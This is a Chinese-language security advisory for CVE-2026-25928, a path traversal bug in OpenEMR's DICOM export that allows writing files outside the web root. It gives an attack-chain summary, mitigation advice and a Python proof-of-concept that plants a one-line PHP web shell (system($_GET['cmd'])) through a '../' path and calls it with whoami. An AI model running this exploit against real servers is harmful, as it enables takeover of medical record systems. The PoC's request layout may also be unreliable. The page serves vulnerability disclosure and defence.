CVE-2026-25928 CVSS 6.5 中危

CVE-2026-25928 OpenEMR路径遍历致RCE漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-25928

漏洞类型

路径遍历, 任意文件写入, 远程代码执行

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenEMR

漏洞概述

OpenEMR 8.0.0.2之前版本存在路径遍历漏洞。其DICOM zip/export功能在创建zip文件时，未过滤用户提供的路径序列（如../）。具备DICOM权限的攻击者可利用此漏洞在Web根目录外写入文件，从而实现任意文件写入，并可能导致远程代码执行。

技术细节

该漏洞源于OpenEMR在处理DICOM导出功能时，直接将用户输入的参数作为文件路径的一部分，未进行充分的输入验证和路径规范化。攻击者可以通过在文件名或路径字段中插入路径遍历序列（例如"../"），从而绕过预期的目录限制。由于应用未正确限制写入位置，攻击者可以将恶意构造的文件（如PHP webshell）写入Web服务器的可执行目录。一旦文件写入成功，攻击者即可通过浏览器访问该恶意文件，导致服务器执行任意代码，完全控制受影响的应用服务器。这通常需要攻击者拥有DICOM上传或导出权限，但利用门槛相对较低，危害性极高。

攻击链分析

STEP 1

侦察

攻击者发现目标OpenEMR系统，并确认版本低于8.0.0.2。

STEP 2

获取权限

攻击者通过合法或非法手段获取一个具有DICOM上传或导出权限的低权限账户。

STEP 3

漏洞利用

攻击者构造包含路径遍历序列（../）的恶意请求，向Web根目录写入PHP webshell文件。

STEP 4

执行代码

攻击者通过浏览器访问上传的webshell，执行系统命令，获取服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable OpenEMR instance
target_url = "http://example.com/openemr/interface/dicom/dicom_export.php"

# Attacker's session cookie (obtained after login)
cookies = {
    "OpenEMR": "attacker_session_cookie_value"
}

# Payload exploiting path traversal to write a PHP shell
# The application uses the 'path' parameter to determine the zip destination
exploit_data = {
    "path": "../../../../var/www/html/exploit.php",  # Path traversal sequence
    "format": "zip"
}

# Malicious file content to be written (simple PHP shell)
files = {
    "file": ("exploit.php", "<?php system($_GET['cmd']); ?>", "application/x-php")
}

try:
    response = requests.post(target_url, data=exploit_data, files=files, cookies=cookies)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the web root for the shell: http://example.com/exploit.php?cmd=whoami")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

OpenEMR < 8.0.0.2

防御指南

临时缓解措施

如果无法立即升级，建议通过WAF或Web服务器配置规则，拦截包含路径遍历字符（如../）的请求，并临时禁用DICOM导出功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表